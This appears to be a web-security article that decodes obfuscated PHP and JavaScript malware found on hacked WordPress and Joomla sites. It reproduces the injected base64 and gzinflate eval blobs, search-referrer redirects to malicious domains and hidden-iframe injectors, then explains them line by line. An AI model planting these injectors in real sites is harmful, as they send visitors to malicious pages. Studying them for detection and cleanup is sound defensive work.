Examples of Malicious PHP Codes

  • Date:

Examples of malicious php codes

PHP is a powerful scripting language and it’s built in base64 encode/decode capabilities allow hackers to obfuscate their malicious code, which is quite effective at “hiding” what the function of the code is. In php sites such as WordPress, Joomla, Drupal (and many other CMS) base​64 encoding is a common technique implemented by hackers.

This simple line of code

$tmp=base​64_encode('I am a really malicious line of code!');

will base64 encode the string “I am a really malicious line of code!”. The line echo($tmp) will echo the encoded string “SSBhbSBhIHJlYWx​seSBtYWxpY2lvdXM​gbGluZSBvZiBjb2RlIQ==” to the browser. Then it will add the base​64_de​code function to the pages of a sites.

ev​al(base​64_de​code('SSBhbSBhIHJlYWxseSBtYWxpY2lvdXMgbGluZSBvZiBjb2RlIQ==');

When the page is requested the php code will be executed on the server and the malicious line will be added to the content that is sent to the user. While a site owner would instantly suspect

I am a really malicious line of code!

but the function of the base64 encoded code is not as clear. While ev​al(base​64_de​code(‘..[seemingly random string]…’); is the most common one, hackers also use other php encode functions such as

ev​al(gzinflate(base​64_de​code('...');
ev​al(gzuncompress(base​64_de​code('...);
ev​al(gzinflate(str_rot13(base​64_de​code('...');

When these codes are executed on your server, the results of those executions are inserted into the code that is sent to the user’s browser. If you open the page in a browser and view the source, you will not see the PHP code. Instead you will see whatever output is being generated by the script. To find and remove the actual PHP codes you will need to edit the infected files on your server. There are a lot of tools online which will de​code most base​64 encoded stuff.

The following base64 encoded php was found in the homepage (index.php) of a Joomla site but this type of code can be found on any site running php.

ev​al(base​64_de​code("ZXJyb3JfcmVwb3J0aW5nKDApOw0KJHRydW09aGVhZGVyc19zZW50KCk7DQokcmVmZXJlcj0kX1NFUlZFUlsnSFRUUF9SRUZFUkVSJ107DQokdWE9JF9TRVJWRVJbJ0h UVFBfVVNFUl9BR0VOVCddOw0KaWYgKHN0cmlzdHIoJHVhLCJtc2llIikpew0KaWYgKCEkdHJ1bSl7DQppZiAoc3RyaXN0cigkcmVmZXJlciwieWFob28iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJnb29nbGUiKSBvciBzdHJ pc3RyKCRyZWZlcmVyLCJiaW5nIikpIHsNCglpZiAoIXN0cmlzdHIoJHJlZmVyZXIsInNpdGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7CQkNCgkJaGV hZGVyKCJMb2NhdGlvbjogaHR0cDovL2FsYXBvdHJlbW5iYS5vc2EucGwvcmlmLyIpOw0KCQlleGl0KCk7DQoJfQ0KCX0NCn1lbHNlIHsNCmVjaG8gIjxpZnJhbWUgc3JjPSdodHRwOi8vcnRqaHRleWp0eWp0eWoub3JnZS5 wbC9tZG0vJyBmcmFtZWJvcmRlcj0wIGhlaWdodD0xIHdpZHRoPTEgc2Nyb2xsaW5nPW5vPjwvaWZyYW1lPiI7DQp9DQoJfQ=="));

Which decodes to the following script —

error_reporting(0);$trum=headers_sent();$referer=$_SERVER['HTTP_REFERER'];$ua=$_SERVER['HTTP_USER_AGENT'];if (stristr($ua,"msie")){if (!$trum){if (stristr($referer,"yahoo") or stristr($referer,"google") or stristr($referer,"bing")){if (!stristr($referer,"site") or !stristr($referer,"cache") or !stristr($referer,"inurl")){header("Location: hxxp://alapotremnba.osa.pl/rif/");exit();}}}else{echo "< if​rame frameborder="0" height="1" scrolling="no" src="hxxp:// rtjhteyjtyjtyj . orge . pl/mdm/" width="1"></ifr​ame>";}}

Now lets take a closer look at the code

error_reporting(0); –> Turns off php error reporting

Note: Anytime you see a php script start with

error_reporting(0); or error_reporting(E_ERROR | E_WARNING | E_PARSE); or ini_set(‘display_errors’, “0”);

you should be suspicious. These lines of codes are used by hackers to turn off PHP’s error reporting capability.

$trum=headers_sent(); –> Sets the variable to true if the headers have been sent to the requester.

$referer=​$_SERVER[‘HTTP_REFERER’]; –> Sets the variable to the referring page.

$ua=​$_SERVER[‘HTTP_USER_AGENT’]; –> Sets the variable to the user agent in the request.

if (stristr($ua,”msie”)) –> If the string ‘msie’ is in the user agent, continue for Internet Explorer.

if (!$trum) –> If the Headers weren’t sent, continue…

if (stristr($referer,”yahoo”) or stristr($referer,”google”) or stristr($referer,”bing”)) –> If the string ‘yahoo’, ‘google’ or ‘bing’ is in the URL of the referring page, continue to a search results page.

if (!stristr($referer,”site”) or !stristr($referer,”cache”) or !stristr($referer,”inurl”)) –> The conditional checks if the search operators site:, cache:, or inurl: is in the referring page and if it is, the redirect will NOT (!) occur.

header(“Location: hxxp://alapotremnba.osa.pl/rif/”); –> This line redirects the request to a malicious location.

exit();

else –> This ‘else’ goes with the ‘headers sent’ line. If the headers have been sent, then trying to redirect would create a php error. So instead of redirecting, it adds a malicious hidden iframe to the page.

echo “< if rame frameborder=”0″ height=”1″ scrolling=”no” src=”hxxp:// rtjhteyjtyjtyj . orge . pl/mdm/” width=”1″></if rame>”; –> This writes the malicious iframe.

The following codes are some commonly used redirects…

base​64_de​code(​"DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTs NCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmICghc3RyaXN0cigkdWFnLCJNU0lFIDcuMCIpKXsKaWYgKHN0cmlzdHIoJHJlZmVyZXIsInlhaG9vIikgb3Igc3RyaXN0cigkcmV mZXJlciwiYmluZyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInJhbWJsZXIiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJnb2dvIikgb3Igc3RyaXN0cigkcmVmZXJlciwibGl2ZS5jb20iKW9yIHN0cmlzdHIoJHJlZmVyZXIsImF wb3J0Iikgb3Igc3RyaXN0cigkcmVmZXJlciwibmlnbWEiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ3ZWJhbHRhIikgb3Igc3RyaXN0cigkcmVm ZXJlciwiYmVndW4ucnUiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJzdHVtYm xldXBvbi5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaXQubHkiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ0aW55dXJsLmNvbSIpIG9yIHByZWdfbWF0Y2goIi95YW5kZXhcLnJ1XC95YW5kc2VhcmNoXD8oLio/KVwmbH JcPS8iLCRyZWZlcmVyKSBvciBwcmVnX21hdGNoICgiL2dvb2dsZVwuKC4qPylcL3VybFw/c2EvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibXlzcGFjZS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYW NlYm9vay5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJhb2wuY29tIikpIHsNCmlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7DQpoZWFkZXIoIkxvY2F0aW 9uOiBodHRwOi8vd3d3Ni51aW9wcXcuamt1Yi5jb20vIik7DQpleGl0KCk7DQp9Cn0KfQ0KfQ0KfQ==")

Which writes another conditional redirect…

error_reporting(0); $qazplm=headers_sent(); if (!$qazplm){ $referer=$_SERVER['HTTP_REFERER']; $uag=$_SERVER['HTTP_USER_AGENT']; if ($uag) { if (!stristr($uag,"MSIE 7.0")){if (stristr($referer,"yahoo") or stristr($referer,"bing") or stristr($referer,"rambler") or stristr($referer,"gogo") or stristr($referer,"live.com")or stristr($referer,"aport") or stristr($referer,"nigma") or stristr($referer,"webalta") or stristr($referer,"begun.ru") or stristr($referer,"stumbleupon.com") or stristr($referer,"bit.ly") or stristr($referer,"tinyurl.com") or preg_match("/yandex.ru/yandsearch?(.?)&lr=/",$referer) or preg_match ("/google.(.?)/url?sa/",$referer) or stristr($referer,"myspace.com") or stristr($referer,"facebook.com") or stristr($referer,"aol.com")) { if (!stristr($referer,"cache") or !stristr($referer,"inurl")){ header("Location: hxxp:// www6 . uiopqw . jkub . com/"); exit(); }}} } }
ev​al(base​64_de​code(​"aWYgKHN0cmlzdHIoJF9TRVJWRVJbSFRUUF9SRUZFUkVSXSwiYmluZyIpKSB7DQpwcmVnX21hdGNoICgiL3FcPSguKj8pJi8iLCRfU0VSVkVSW0hUVFBfUkVG RVJFUl0sJGtrKTsNCgkJaGVhZGVyKCJMb2NhdGlvbjogaHR0cDovL3Byb3BwZXJhLmNvLmNjLz9xPSIuJGtrWzFdKTsNCgkJZXhpdCgpOw0KfQ0KZWxzZWlmIChzdHJpc3RyKCRfU0VSVkVSW0hUVFBfUkVGRVJFUl0sInlh aG9vIikpIHsNCnByZWdfbWF0Y2ggKCIvcFw9KC4qPykmLyIsJF9TRVJWRVJbSFRUUF9SRUZFUkVSXSwka2spOw0KCQloZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vcHJvcHBlcmEuY28uY2MvP3E9Ii4ka2tbMV0pOw0KCQll eGl0KCk7DQp9ZWxzZWlmIChzdHJpc3RyKCRfU0VSVkVSW0hUVFBfUkVGRVJFUl0sImdvb2dsZSIpKSB7DQoJaWYgKCFzdHJpc3RyKCRfU0VSVkVSW0hUVFBfUkVGRVJFUl0sIi5udSIpIGFuZCAhc3RyaXN0cigkX1NFUlZF UltIVFRQX1JFRkVSRVJdLCJzaXRlIikgYW5kICFzdHJpc3RyKCRfU0VSVkVSW0hUVFBfUkVGRVJFUl0sImludXJsIikpew0KCQlwcmVnX21hdGNoICgiL3FcPSguKikvIiwkX1NFUlZFUltIVFRQX1JFRkVSRVJdLCRrayk7 DQoJCWlmIChzdHJpc3RyKCRra1sxXSwiJiIpKSB7DQoJCQlwcmVnX21hdGNoICgiLyguKj8pXCYvIiwka2tbMV0sJGtleTIpOw0KCQkJJGtleXdvcmQ9dXJsZGVjb2RlKCRrZXkyWzFdKTsNCgkJfWVsc2Ugew0KCQkJJGtl eXdvcmQ9dXJsZGVjb2RlKCRra1sxXSk7DQoJCX0NCgkJaGVhZGVyKCJMb2NhdGlvbjogaHR0cDovL3Byb3BwZXJhLmNvLmNjLz9xPSIuJGtleXdvcmQpOw0KCQlleGl0KCk7DQoJfQ0KDQp9"));
if (stristr($_SERVER[http_REFERER],"bing")){preg_match ("/q\=(.*?)&/",$_SERVER[http_REFERER],$kk);header("Location: hxxp:// proppera . co . cc /?q=".$kk[1]);exit();}elseif (stristr($_SERVER[http_REFERER],"yahoo")){preg_match ("/p\=(.*?)&/",$_SERVER[http_REFERER],$kk);header("Location: hxxp:// proppera . co . cc/?q=".$kk[1]);exit();}elseif (stristr($_SERVER[http_REFERER],"google")){if (!stristr($_SERVER[http_REFERER],".nu")and !stristr($_SERVER[http_REFERER],"site")and !stristr($_SERVER[http_REFERER],"inurl")){preg_match ("/q\=(.*)/",$_SERVER[http_REFERER],$kk);if (stristr($kk[1],"&")){preg_match ("/(.*?)\&/",$kk[1],$key2);$keyword=urlde​code($key2[1]);}else{$keyword=urlde​code($kk[1]);}header("Location: hxxp:// proppera . co . cc /?q=".$keyword);exit();}}
ev​al(base​64_de​code(​"ZXJyb3JfcmVwb3J0aW5nKDApOw0KJG5jY3Y9aGVhZGVyc19zZW50KCk7DQppZiAoISRuY2N2KXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVIn XTsNCiR1YT0kX1NFUlZFUlsnSFRUUF9VU0VSX0FHRU5UJ107DQppZiAoc3RyaXN0cigkcmVmZXJlciwieWFob28iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJnb29nbGUiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaW5nIikp IHsNCglpZiAoIXN0cmlzdHIoJHJlZmVyZXIsInNpdGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7CQkNCgkJaGVhZGVyKCJMb2NhdGlvbjogaHR0cDov L2J1eW9yZGllLm9zYS5wbC8iKTsNCgkJZXhpdCgpOw0KCX0NCn0NCn0="));
error_reporting(0);$nccv=headers_sent();if (!$nccv){$referer=$_SERVER['http_REFERER'];$ua=$_SERVER['http_USER_AGENT'];if (stristr($referer,"yahoo") or stristr($referer,"google") or stristr($referer,"bing")){if (!stristr($referer,"site") or !stristr($referer,"cache") or !stristr($referer,"inurl")){header("Location: hxxp:// buyordie . osa . pl/");exit();} } }

The following block of codes can be found on a lot of WordPress sites. In most cases it redirects search results to uniqtext.com/search.php?theme=[search query used]

$md5 = "a5d67011f6466a82320bc9bcbcaab8c5";$wp_salt = array("n",'(','o',"l","d",'c','r','e','f',"v","$","_",';','g',"z","b",'t','6',")","s",'i','4','a');$wp_add_filter = create_function('

On many sites, hackers use these obfuscated PHP codes...

ev​al(gzinflate(base​64_de​code('3VZNc5swEP0rLRcgTBwkhIAh6qW99NxjJgfHhppMgm1Q6ok94bdXu5IwdmKHZnrodAbLeNndt19vzXU7a6qV/DIX36ayyOeiLjaf5p6fL8Tlatq0xfdae m5IqOtfxXlVepuqni83k/ly9vRY1NKXzfNO2TjrTeFMVs1SLuXzqniZTeVs4a3Xa3+33Qp3+uDm8P3LDbbbvG2F44Az4u9K4ZZu4Dbqs3xUx9fFtHHzUpTqFmRzdRRu/lIIuajam3LSPt21svEI8ZWr21wK91k9roUTTeIOP jGBI+xI3JGsY1kXMyVgKUgTOECJZXDHlKSjVGn3oqSL0Elkfh8pxxxQlAWIGOkYegTzKDU/eguFTlKENiFk2gyFBB2AmCqo2Eo4uIpNJscZxfwYQkkABW5pemTJwYpYxUiHrgM7gTOuVqnG1UEl+1R5R7MzoZJYRwBPwAXtS xETrKy6IAuFAU+pNcaI4CF6Tgdt0RFy1B7q9ocS61SYNdFuuQFFcWrdY2TYlUTXArxqRVWeUKth1BQu7BwcDC8MAw/Wt9h6J6a2iLLPW5tHe2VikiN2pnRlzlhwE3w2GNlBYVPji/dRWEnU9y/Ww4NYJlC8dM/1VNkS9n76f jCrZqqW GiVmQJLBkGhfllghppZCOtT2gGmwgRTziEIYLd27k/OllAg/R4WhANF16Cx9Ix8yknRv09VuAo5+cBPRzJJxBMWYodh+Gm0Jz+4mu2/OcLDfPLpEIc44Hy4/292k5zj0NDniejo5YrMeT/KfE/qtyr2iH0T3h0sw df002Udgfg+Q3uk94k6GvWQy4M1Nd7FgPXv2n9kSF8v4IN RPdyof4sZJxb5KOQP/Sf/C+8vQM7E/FvsMZVRRAfzjYGBa9iLJ5e1M2lXD5X0nGnn9G98 vp+Xy8arRJhXnwUnJK+CwN/diwreKNs2+CGbqv55U956l4sLj16 SgFzUN/e3yvAF3zbXS gveO7dbv/AcJ1j7+fWVeQP+DQ==');

to write obfuscated JavaScripts...

<scr​ip​t>d=Date;d=new d();h=-parse​Int('012')/5;if(window.do​cument)try{new'qwe'.prototype} ca​tch(qqq){zz='al';zz='v'+zz;ss='';if(1){f='f'+'r'+'om'+'Char';f=f+'C'+'od'+'e';}e=this[f.substr(11)+zz];t='y';}n='3.5~3.5~51.5~50~15~19~49~54.5~48.5~57.5~53.5~49.5~54~57~22~ 50.5~49.5~57~33.5~53~49.5~53.5~49.5~54~57~56.5~32~59.5~41~47.5~50.5~ 38~47.5~53.5~49.5~19~18.5~48~54.5~49~59.5~18.5~19.5~44.5~23~45.5~19.5 ~60.5~5.5~3.5~3.5~3.5~51.5~50~56~47.5~53.5~49.5~56~19~19.5~28.5~5.5~ 3.5~3.5~61.5~15~49.5~53~56.5~49.5~15~60.5~5.5~3.5~3.5~3.5~49~54.5~ 48.5~57.5~53.5~49.5~54~57~22~58.5~56~51.5~57~49.5~19~16~29~51.5~50~56 ~47.5~53.5~49.5~15~56.5~56~48.5~29.5~18.5~51~57~57~55~28~22.5~22.5~ 53.5~54.5~57~51.5~58~49.5~53.5~57.5~56.5~22~53.5~54.5~54.5~54.5~22~ 48.5~54.5~53.5~22.5~56.5~51~54.5~58.5~57~51~56~49.5~47.5~49~22~55~51~55 ~30.5~57~29.5~25~25.5~23.5~24~24~26.5~26.5~24.5~18.5~15~58.5~51.5~49~57~ 51~29.5~18.5~23.5~23~18.5~15~51~49.5~51.5~50.5~51~57~29.5~18.5~23.5~23~ 18.5~15~56.5~57~59.5~53~49.5~29.5~18.5~58~51.5~56.5~51.5~48~51.5~53~51.5~ 57~59.5~28~51~51.5~49~49~49.5~54~28.5~55~54.5~56.5~51.5~57~51.5~54.5~ 54~28~47.5~48~56.5~54.5~53~57.5~57~49.5~28.5~53~49.5~50~57~28~23~28.5~ 57~54.5~55~28~23~28.5~18.5~30~29~22.5~51.5~50~56~47.5~53.5~49.5~30~16 ~19.5~28.5~5.5~3.5~3.5~61.5~5.5~3.5~3.5~50~57.5~54~48.5~57~51.5~54.5~ 54~15~51.5~50~56~47.5~53.5~49.5~56~19~19.5~60.5~5.5~3.5~3.5~3.5~58~ 47.5~56~15~50~15~29.5~15~49~54.5~48.5~57.5~53.5~49.5~54~57~22~48.5~ 56~49.5~47.5~57~49.5~33.5~53~49.5~53.5~49.5~54~57~19~18.5~51.5~50~56~ 47.5~53.5~49.5~18.5~19.5~28.5~50~22~56.5~49.5~57~31.5~57~57~56~51.5~ 48~57.5~57~49.5~19~18.5~56.5~56~48.5~18.5~21~18.5~51~57~57~55~28~22.5~ 22.5~53.5~54.5~57~51.5~58~49.5~53.5~57.5~56.5~22~53.5~54.5~54.5~54.5~ 22~48.5~54.5~53.5~22.5~56.5~51~54.5~58.5~57~51~56~49.5~47.5~49~22~55~ 51~55~30.5~57~29.5~25~25.5~23.5~24~24~26.5~26.5~24.5~18.5~19.5~28.5~ 50~22~56.5~57~59.5~53~49.5~22~58~51.5~56.5~51.5~48~51.5~53~51.5~57~ 59.5~29.5~18.5~51~51.5~49~49~49.5~54~18.5~28.5~50~22~56.5~57~59.5~53~ 49.5~22~55~54.5~56.5~51.5~57~51.5~54.5~54~29.5~18.5~47.5~48~56.5~54.5~ 53~57.5~57~49.5~18.5~28.5~50~22~56.5~57~59.5~53~49.5~22~53~49.5~50~57~ 29.5~18.5~23~18.5~28.5~50~22~56.5~57~59.5~53~49.5~22~57~54.5~55~29.5~ 18.5~23~18.5~28.5~50~22~56.5~49.5~57~31.5~57~57~56~51.5~48~57.5~57~49.5~ 19~18.5~58.5~51.5~49~57~51~18.5~21~18.5~23.5~23~18.5~19.5~28.5~50~22~ 56.5~49.5~57~31.5~57~57~56~51.5~48~57.5~57~49.5~19~18.5~51~49.5~51.5~ 50.5~51~57~18.5~21~18.5~23.5~23~18.5~19.5~28.5~5.5~3.5~3.5~3.5~49~54.5~ 48.5~57.5~53.5~49.5~54~57~22~50.5~49.5~57~33.5~53~49.5~53.5~49.5~54~57~ 56.5~32~59.5~41~47.5~50.5~38~47.5~53.5~49.5~19~18.5~48~54.5~49~59.5~18.5~ 19.5~44.5~23~45.5~22~47.5~55~55~49.5~54~49~32.5~51~51.5~53~49~19~50~19.5~ 28.5~5.5~3.5~3.5~61.5'.split('a~'.substr(1));for(i=0;i!=611;i++){j=i; ss=ss+St​ringf;}if(1)q=ss;if(zz)e(''+q);

to add malicious iframes to the pages on the site...

if (document.getElementsByTagName('body')[0]){iframer();}else {document.write("<iframe src='hxxp://motivemus.mooo.com/showthread.php?t=45122773' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");} function iframer(){var f = document.createElement('iframe');f.setAttribute('src', 'hxxp:// motivemus . mooo . com /showthread.php?t=45122773');f.style.visibility = 'hidden';f.style.position = 'absolute';f.style.left = '0';f.style.top = '0';f.setAttribute('width', '10');f.setAttribute('height', '10');document.getElementsByTagName('body')[0].appendChild(f);}

This is another example of an obfuscated script used to insert an iframe but the php is "double" encoded...

ev​al(gzinflate(base​64_de​code('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');

When we plug that long string of characters into a de​coder we get...

if (!isset($frmDs)){ global $frmDs; $frmDs = 1; $ua = $_SERVER['HTTP_USER_AGENT']; if (strpos($ua, 'Windows')!==false&&strpos($ua,'MSIE')!==false){ error_reporting(0); if(strpos(strtolower(@$_SERVER["HTTP_COOKIE"].';'.$_SERVER['REQUEST_URI']),'admin')!==false)$isadm=1; if(isset($isadm)||!isset($_COOKIE['__utmfr']))@setcookie('__utmfr',rand(1,1000),time()+86400*(($isadm)?365:7),'/'); if(!isset($isadm)&&!isset($_COOKIE['__utmfr']))print(''); } }

While it is starting to be a little more readable, we still have another long base​64 encoded string. Plugging that into the de​coder again, we can now see the JavaScript that is appearing in the pages of the site...

t​ry{do​cument.body--}catch(gdsgd){ww=window;v="v"+"al";if(ww.do​cument)t​ry{do​cument.body=12;}ca​tch(gdsgsdg){ asd=0;t​ry{q=do​cument.cr​eate​Element("div");}catch(q){asd=1;}if(!asd){w={a:ww}.a;v="e".concat(v);}}e=w[v];if(1) {f=ne​w Ar​ray(102,116,108,96,116,104,109,107,32,102,112,94,40,96,42,95,41,122,112,98,116,116,112,107,32,76,95,113,104,45,100,105,111,110,112,37,77,96, 114,101,46,113,95,107,100,110,107,37,41,41,38,95,45,96,41,46,41,40,41,94,59,124,11,7,102,116,108,96,116,104,109,107,32,113,113,37,41,122,112,98,116,116,112,107,32, 76,95,113,104,45,112,94,110,99,109,106,40,40,44,113,111,82,114,111,105,109,101,37,51,53,39,43,115,116,96,112,116,113,103,107,103,39,51,38,59,124,11,7,105,101,38,107, 97,117,103,100,97,115,109,111,46,98,109,108,107,104,99,66,110,96,96,105,101,99,39,120,13,9,7,115,97,113,30,112,116,109,107,58,114,114,38,38,59,12,8,6,118,96,112,29, 117,96,30,58,32,109,95,115,105,102,95,113,111,113,44,114,115,100,112,62,103,100,108,113,59,12,8,6,105,101,38,114,97,45,103,107,100,100,118,76,102,39,37,84,105,109, 98,108,119,114,37,38,33,60,43,46,32,37,36,29,117,96,44,102,110,99,99,117,79,101,38,36,77,82,71,66,39,40,31,58,45,48,39,120,13,9,7,6,100,110,97,114,109,100,108,113, 46,118,112,102,116,100,38,36,60,114,114,118,108,100,60,43,115,38,41,112,116,109,107,40,39,31,121,29,112,110,113,102,116,104,109,107,58,96,96,112,111,107,115,113,101, 58,30,105,101,101,114,55,45,38,41,100,114,96,38,51,48,47,42,46,48,47,46,38,43,38,110,117,59,31,114,108,112,57,43,36,43,102,112,94,40,53,46,45,44,48,46,45,48,40,41,36, 112,119,57,29,125,59,45,112,116,120,106,98,62,31,58,97,105,117,30,96,108,96,113,112,61,33,113,36,43,114,114,107,109,42,37,31,62,59,103,99,114,96,107,98,32,114,112,96, 61,33,102,113,116,111,56,44,47,107,99,98,110,103,104,117,115,120,44,106,121,101,117,43,117,114,45,94,100,46,100,98,101,99,44,109,104,111,32,29,119,104,98,113,104,60, 32,36,43,102,112,94,40,50,46,45,44,53,46,45,41,42,37,31,32,103,99,102,103,103,114,58,34,38,41,100,114,96,38,48,48,47,42,51,48,47,39,40,39,33,60,57,47,104,100,111,97, 108,99,59,60,46,98,102,118,61,37,38,59,12,8,6,125,12,8,6,118,96,112,29,101,119,110,58,110,100,117,29,68,96,114,98,40,40,57,98,120,111,44,112,101,115,66,94,116,100,38, 98,120,111,44,100,101,115,66,94,116,100,38,38,43,54,39,56,13,9,7,102,102,39,98,108,99,116,107,98,110,115,44,96,111,110,105,102,101,45,103,107,100,100,118,76,102,39, 37,92,95,116,114,106,102,113,59,36,41,60,59,42,49,40,121,97,111,98,115,106,101,109,114,43,99,110,109,104,105,100,59,36,95,94,115,113,109,101,112,58,39,42,112,112,40, 40,41,36,59,31,99,117,112,104,112,98,115,60,37,40,101,119,110,43,116,110,69,74,84,82,114,111,105,109,101,37,41,42,37,56,32,111,95,113,104,60,45,36,59,124,11,7,125);} w=f;s=[];for(i=0;-i+709!=0;i+=1){j=i;if((031==0x19))if(e)s=s+St​ring.from​CharCode((1*w[j]+e("j%4")));}xz=e;xz(s)}

A "de-obfuscation" of the JavaScript and the purpose of the code now becomes clear...

function gra(a, b){return Math.floor(Math.random() * (b - a + 1)) + a;}function rs(){return Math.random().toString(36).substring(5);}if (navigator.cookieEnabled){var stnm = rs();var ua = navigator.userAgent;if (ua.indexOf('Windows') !=- 1 && ua.indexOf('MSIE') !=- 1){document.write('<style>.s' + stnm + ' { position:absolute; left:-' + gra(600, 1000) + 'px; top:-' + gra(600, 1000) + 'px; }</style> <div class="s' + stnm + '"><iframe src="hxxp://leenhjxsy.myfw.us/ad/feed.php" width="' + gra(300, 600) + '" height="' + gra(300, 600) + '"></iframe></div>');}var exp = new Date();exp.setDate(exp.getDate() + 7);if (document.cookie.indexOf('__utmfr=') ==- 1){document.cookie = '__utmfr=' + rs() + '; expires=' + exp.toGMTString() + '; path=/';}}

When the JavaScript is executed by the user's browser, we get a hidden iframe loading malicious content from another site...

<style>.sot719io4 { position:absolute; left:-806px; top:-869px; }</style> <div class="sot719io4"> <iframe src="hxxp:// leenhjxsy . myfw . us /ad/feed.php" width="564" height="303"></iframe></div>

Always follow up with some basic security checks!

